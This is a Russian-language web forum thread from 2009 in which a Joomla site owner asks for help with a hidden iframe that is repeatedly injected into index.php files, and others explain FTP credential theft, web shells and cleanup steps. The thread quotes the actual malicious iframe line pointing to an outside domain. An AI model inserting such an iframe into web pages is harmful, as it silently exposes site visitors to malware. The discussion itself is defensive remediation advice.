Помощник
|
вирус мучает мою джумлу, в индексе и в шаблоне |
vetbars
|
Сообщение
#1
|
||
|
|
||
|
|||
Mars |
26.4.2009, 14:33;
Ответить: Mars
Сообщение
#2
|
|
Привет! У меня проблема с вирусами, частенько садится вирус в index.php сайта и index.php шаблона. Раньше думал, что версия старая, (1.0.12 была), обновил до 1.0.15, написано, что в ней устранены серьезные дырки и т.д. В админке выставил максимальную безопасность. После того как перезалеваю основной индекс, сайт начинает работать. Но вирус все равно обнаруживается... ни каспер ни нод его не видят, но авира например ругается. В коде индекс.пхп шаблона добавляется вот эта строчка <iframe src="http://googlerussiablog.cn/index.php" width="0" height="0" style="display:none;"></iframe> Что делать? Это хостер чтоли такой дырявый у меня? или джумла не стабильная? Просто удали из index.php эту строчку и все норм! Было такое... Как бороться не знаю... Я один раз удалил, больше не мучали тьфу..тьфу... Сообщение отредактировал Mars - 26.4.2009, 14:34 |
|
|
vetbars
|
Сообщение
#3
|
|
Дык в том то и дело, уже 3ий раз удаляю. И снова появляется!
-------------------- |
|
|
vinokur |
26.4.2009, 14:54;
Ответить: vinokur
Сообщение
#4
|
|
Такого рода вирусы по следующей схеме работают. Ты цепляешь вирус сначала на свой локальный компьютер, тот сканирует куки и ищет пароли доступа по ftp. Все что найдет, собирает в общей базе, откуда централизовано в файлы с определенными именами (включающие слово index и ряд других во всех папках) вешается фрейм.
Делать надо следующее по шагам: 1. Вычисти свой компьютер. 2. Замени пароль на ftp 3. Очисти сайт (весь!). Фрейм у тебя не только в index.php. Запусти поиск по содержанию текста в файле. В сумме это поможет. -------------------- |
|
|
vetbars
|
Сообщение
#5
|
|
Спасибо! Дейтсительно, во всех файлах индекс находится этот код (( ПРидется чистить все. Подскажите пожалуйста, как так запустить поиск по содержанию текста в файле?
Сейчас все с фтп выкачаю и проверю. да? -------------------- |
|
|
anthon |
26.4.2009, 17:38;
Ответить: anthon
Сообщение
#6
|
|
поменяйте пароли FTP, не храните пароли на компе.
|
|
|
vetbars
|
Сообщение
#7
|
|
Начал подозревать, что все дела в компоненте com_joomlaxplorer. Он оставля у меян с версии 12. В 15ой его уже нету.... Прочитал по нему инфу, версия этого компонента 1.6.0 дырявая как решето, а у меня стоит 1.5.1 вообще. Так что будем надеяться что дело было в нем....
Спросил у хостера про шеллы, он сказал, что шеллы вообще на хостинге отключены для безопасности. 1. Вычисти свой компьютер. сделал, нашел несколько вирей. 2. Замени пароль на ftp сделал. 3. Очисти сайт (весь!) с этим пока проблема.... не знаю весь или нет, но часть очистил путем замены файлов на оригинальные. -------------------- |
|
|
vinokur |
26.4.2009, 19:51;
Ответить: vinokur
Сообщение
#8
|
|
Найти на ftp файлы с нужным текстом можно и без выкачивания содержания. Способов наверно много, но я использую Total Commander. Подключаешься по ftp (там кнопка прямо на панели) - у тебя содержимое открывается в одной из панелей программы. После этого запускаешь search (из директории Commands) и там в одной из опций можешь задать текст для поиска (кусок текста, который тебе инжектировали). После этого сиди и жди, пока программа будет искать
-------------------- |
|
|
Niken |
26.4.2009, 19:58;
Ответить: Niken
Сообщение
#9
|
|
С джкмлой это никак не связано) Это проблема возникла либо у вас на машине, илбо у кого-то кто имеет доступ к фтп, после этого троян увёл все пароли. Поэтому, советую также сменить пароль и к админке
-------------------- |
|
|
vMaster |
26.4.2009, 23:23;
Ответить: vMaster
Сообщение
#10
|
|
Спросил у хостера про шеллы, он сказал, что шеллы вообще на хостинге отключены для безопасности. А толку, что отключены? =) Наверняка у них просто включен php safe_mode и отключены функции system(), passthru(), exec() и тому подобные. В любом случае, от взлома это не спасет. Скорее всего на вашем сайте присутствует так называемый web-shell, с помощью которого злоумышленник вставляет iframe-код в индексы, либо backdoor, спрятанный в скриптах самой jooml'ы. Если это так, вполне вероятно, что взлом мог быть произведен через "соседей" - то есть сайты, находящиеся на одном сервере с вашим сайтом. Как вариант. В любом случае, рекомендую детально просмотреть логи сервера на предмет доступа к фтп не с вашего ip, а так же веб-сервера, на предмет возможных попыток взлома через http. Сообщение отредактировал vMaster - 26.4.2009, 23:27 -------------------- |
|
|
|
Похожие темы
Тема | Ответов | Автор | Просмотров | Последний ответ | |
---|---|---|---|---|---|
Статейный прогон ваших ссылок через мою PBN (Private Blog Network) Статейный прогон |
6 | Tutich | 2417 | 1.8.2019, 20:24 автор: rokot |
|
Кто и зачем банит мою тему - прошу модера пояснить при всем честном народе.. | 3 | MIGom | 3385 | 20.6.2015, 0:29 автор: OlegK |
|
Помогите объективно оценить мою работу | 5 | Атлет | 1696 | 13.6.2015, 12:07 автор: Evgeniy3200 |
|
куплю у вас на сайте место под мою ссылку, Тема массаж | 1 | volumeandbass_hb | 2172 | 31.12.2013, 9:43 автор: -volumeandbass- |
|
Помогите удалить вирус на joomla 1.5 Готов оплатить помощь. |
5 | pulsar21 | 4407 | 17.5.2013, 8:00 автор: pulsar21 |
Текстовая версия | Сейчас: 24.4.2024, 0:50 |